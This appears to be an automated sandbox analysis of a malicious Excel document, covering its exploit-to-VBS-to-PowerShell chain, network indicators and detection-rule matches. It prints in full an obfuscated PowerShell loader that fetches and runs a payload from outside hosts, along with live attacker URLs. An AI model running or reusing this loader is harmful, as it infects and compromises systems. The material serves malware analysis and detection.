31 ff 53 48 a2 07 1a 7d 31 8c a4 39 00 ae d3 80 57 9b eb 11 e6 2f 83 1e 23 b8 f7 d8 9b e7 8e 24 23 96 18 69 92 fc be a5 ee e2 de f7 62 c9 fa 7d cc 32 8c 99 9b 3b 9b b8 76 ce cf 89 f6 93 79 2e 24 a3 5b 1b 92 50 9b a6 b1 13 e0 6c a7 14 74 3f 5d c6 da a7 0c 7b cc f6 29 11 91 ec 38 cb 9b 3f 42 55 cd 57 d9 cb 8d c3 11 c3 59 30 87 03 40 1d 31 bc 41 25 e9 9e ea 98 66 8f 3d 64 78 92 07 e8 bd 79 ce 66 f2 70 86 ff 08 a8 1f 59 22 31 7b db 5c db ec 05 22 9f 78 9a 2f 6e 56 c9 f9 76 ad 90 96 5b 38 1a fa 57 67 b3 b3 bf 6a f0 eb d4 d6 7c 92 93 87 64 64 c9 94 8d b4 95 f4 58 aa 4b d6 0d 51 35 d2 f3 fa 4c 15 71 2e b2 93 d9 43 8e 56 2b b6 f3 c1 66 a6 89 08 be aa a5 4e 5c 29 27 a1 32 d1 26 5d 43 f8 68 a9 5e 43 f8 22 40 62 c5 00 23 ef 31 f3 d8 c9 b1 a5 eb 8a 8e 69 4a aa 47 47 db 26 b6 f5 5e be 97 44 80 1f 73 4e 5d 69 6d bd c9 c4 a0 24 27 06 86 39 f7 6b 8e b4 74 0a d9 92 47 75 52 f4 ee 60 f4 48 47 86 13 c6 e0 8e 7f b7 91 56 58 ab ae 4c 5c bf 10 d9 f8 ac e8 73 b6 c5 43 dc f2 bb ac 1c ca 50 62 ec cd f5 c8 6c e5 9f f6 16 a9 fe dc 5a e0 09 e6 4a b4 17 af 93 08 59 5e 77 55 b2 bc 5f ab 3e 4e aa fb 61 91 bc b2 b1 2a 5f 5a e9 d8 52 b7 bf b1 61 b6 4b ea d7 d5 73 36 9e 0a e5 43 ce bc 13 8e 90 a1 a8 6d d3 14 d2 7b 5b cf bc c2 cc 01 66 26 96 07 b7 bd 39 a2 4c be 2b ba b2 da 08 57 0d f9 f9 24 74 3d c4 ea 24 d3 d
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\webmadamMPDW-constraints[1].vbsJump to behavior
        Source: global trafficHTTP traffic detected: GET /d/OARvm HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
        Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /webmadamMPDW-constraints.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.19Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /d/OARvm HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: global trafficDNS traffic detected: DNS query: paste.ee
        Source: global trafficDNS traffic detected: DNS query: 1017.filemail.com
        Source: EQNEDT32.EXE, 00000002.00000002.471913915.000000000054F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.19/webmadamMPDW-constraints.vbs
        Source: EQNEDT32.EXE, 00000002.00000002.472170198.00000000035A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.19/webmadamMPDW-constraints.vbsj
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
        Source: powershell.exe, 00000008.00000002.493847190.0000000002AA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
        Source: powershell.exe, 00000008.00000002.494452384.0000000003599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
        Source: wscript.exe, 00000005.00000003.482584084.000000000081D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482501010.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.485062937.000000000081F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/OARvm
        Source: powershell.exe, 00000006.00000002.496961599.0000000002571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.493847190.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
        Source: powershell.exe, 00000008.00000002.493847190.00000000026AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com
        Source: powershell.exe, 00000008.00000002.494613112.0000000004D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/fi
        Source: powershell.exe, 00000008.00000002.493847190.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
        Source: wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
        Source: wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
        Source: wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
        Source: wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
        Source: powershell.exe, 00000008.00000002.494452384.0000000003599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000008.00000002.494452384.0000000003599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000008.00000002.494452384.0000000003599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
        Source: wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
        Source: powershell.exe, 00000008.00000002.494452384.0000000003599000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/OARvmz
        Source: wscript.exe, 00000005.00000002.485092706.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482431871.0000000000882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.494619922.0000000004DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
        Source: wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
        Source: wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
        Source: wscript.exe, 00000005.00000003.482801198.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
        Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
        Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 3660, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 3768, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\ProgIDJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgIDJump to behavior
        Wscript starts Powershell (via cmd or directly)
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQnKyc+JysnPnZmYzsnKyd6WXZlbmRGbGFnID0gdmZjPDxCQVNFNjRfRU5EPj52ZmM7ell2c3RhcnRJbmRleCA9IHpZdmltYWdlVGV4dC5JbmRleE9mKHpZdnN0YXJ0RmxhZyk7ell2ZW5kSW5kZScrJ3ggPSB6WXZpbWFnZVRleHQuSW5kZXhPJysnZih6WXYnKydlbmRGbGFnKTt6WXZzdGFydEluZGV4IC1nZSAwIC1hbmQgell2ZW5kSW5kZXggLWd0IHpZdnN0YXJ0SW5kZXg7ell2c3RhcnRJbmRleCArPSB6WXZzdGFydEZsYWcuTGVuZ3RoOycrJ3pZdmJhc2U2NExlbmd0aCA9IHpZdmVuZEluZGV4IC0gell2c3RhcnRJbmRleDt6WXZiYXNlNjRDb21tYW5kID0gell2JysnaW1hZ2VUZXh0LlN1YnN0cmluZyh6WXZzdGFydEluZGV4LCB6WXZiYXNlNjRMZW5ndCcrJ2gpO3pZdmJhc2U2NFJldmVyc2VkID0gLWpvaW4nKycgKHpZdmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBHb2EgRm9yRWFjaC1PYmplY3QgeyAnKyd6WXYnKydfIH0pWy0xLi4tKHpZdmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ell2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh6WXZiYXNlNjRSZXZlcnNlZCk7ell2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHpZdmNvbW1hbmRCeXQnKydlcyk7ell2dmFpJysnTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh2ZmNWQUl2ZmMpO3pZdnZhaU1ldGhvZC5JbnZva2Uoell2bnVsbCwgQCh2ZmN0eHQuNDU0NDY1NjU0M21tYWRhbWJld2FhYWFhYWFhYXNub2YvOTEuNy44NjEuNDAxLy86cHR0aHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjTVMnKydCdWlsZHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYyx2ZmNkZXNhdGl2YWRvdmZjLHZmY2Rlc2F0aXZhZCcrJ292ZmMsdicrJ2ZjZGVzYScrJ3RpdmFkb3ZmJysnYyx2ZmNkZXNhdCcrJ2l2YWRvdmZjLHZmY2Rlc2F0aXZhZG92ZmMsdmZjMXZmYyx2ZmNkZXNhdGl2YWRvdmZjKSk7JykuUkVQbEFjRSgnR29hJywnfCcpLlJFUGxBY0UoJ3pZdicsJyQnKS5SRVBsQWNFKCd2ZmMnLFtTdFJpbmddW0NoYXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQnKyc+JysnPnZmYzsnKyd6WXZlbmRGbGFnID0gdmZjPDxCQVNFNjRfRU5EPj52ZmM7ell2c3RhcnRJbmRleCA9IHpZdmltYWdlVGV4dC5JbmRleE9mKHpZdnN0YXJ0RmxhZyk7ell2ZW5kSW5kZScrJ3ggPSB6WXZpbWFnZVRleHQuSW5kZXhPJysnZih6WXYnKydlbmRGbGFnKTt6WXZzdGFydEluZGV4IC1nZSAwIC1hbmQgell2ZW5kSW5kZXggLWd0IHpZdnN0YXJ0SW5kZXg7ell2c3RhcnRJbmRleCArPSB6WXZzdGFydEZsYWcuTGVuZ3RoOycrJ3pZdmJhc2U2NExlbmd0aCA9IHpZdmVuZEluZGV4IC0gell2c3RhcnRJbmRleDt6WXZiYXNlNjRDb21tYW5kID0gell2JysnaW1hZ2VUZXh0LlN1YnN0cmluZyh6WXZzdGFydEluZGV4LCB6WXZiYXNlNjRMZW5ndCcrJ2gpO3pZdmJhc2U2NFJldmVyc2VkID0gLWpvaW4nKycgKHpZdmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBHb2EgRm9yRWFjaC1PYmplY3QgeyAnKyd6WXYnKydfIH0pWy0xLi4tKHpZdmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ell2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh6WXZiYXNlNjRSZXZlcnNlZCk7ell2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHpZdmNvbW1hbmRCeXQnKydlcyk7ell2dmFpJysnTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh2ZmNWQUl2ZmMpO3pZdnZhaU1ldGhvZC5JbnZva2Uoell2bnVsbCwgQCh2ZmN0eHQuNDU0NDY1NjU0M21tYWRhbWJld2FhYWFhYWFhYXNub2YvOTEuNy44NjEuNDAxLy86cHR0aHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjTVMnKydCdWlsZHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYyx2ZmNkZXNhdGl2YWRvdmZjLHZmY2Rlc2F0aXZhZCcrJ292ZmMsdicrJ2ZjZGVzYScrJ3RpdmFkb3ZmJysnYyx2ZmNkZXNhdCcrJ2l2YWRvdmZjLHZmY2Rlc2F0aXZhZG92ZmMsdmZjMXZmYyx2ZmNkZXNhdGl2YWRvdmZjKSk7JykuUkVQbEFjRSgnR29hJywnfCcpLlJFUGxBY0UoJ3pZdicsJyQnKS5SRVBsQWNFKCd2ZmMnLFtTdFJpbmddW0NoYXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
        Source: fUHl7rElXU.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2318
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2318Jump to behavior
        Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
        Source: Process Memory Space: powershell.exe PID: 3660, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 3768, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.spre.troj.expl.evad.winXLSX@8/10@5/3
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$fUHl7rElXU.xlsxJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR91F2.tmpJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h.......zl.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........l.........................s............................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................r.e.t.u.r.n.e.d. .a.n. .e.r.r.o.r.:. .(.4.0.0.). .B.a.d. .R.e.q.u.e.s.t...".............L.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........l......................u.e.s.t.........................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.1.3......l......................u.e.s.t.................$.......(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........l......................u.e.s.t.........................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........l......................u.e.s.t.........................(...............Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........l......................u.e.s.t.........................................Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......\.......h........l......................u.e.s.t.........................(...............Jump to behavior
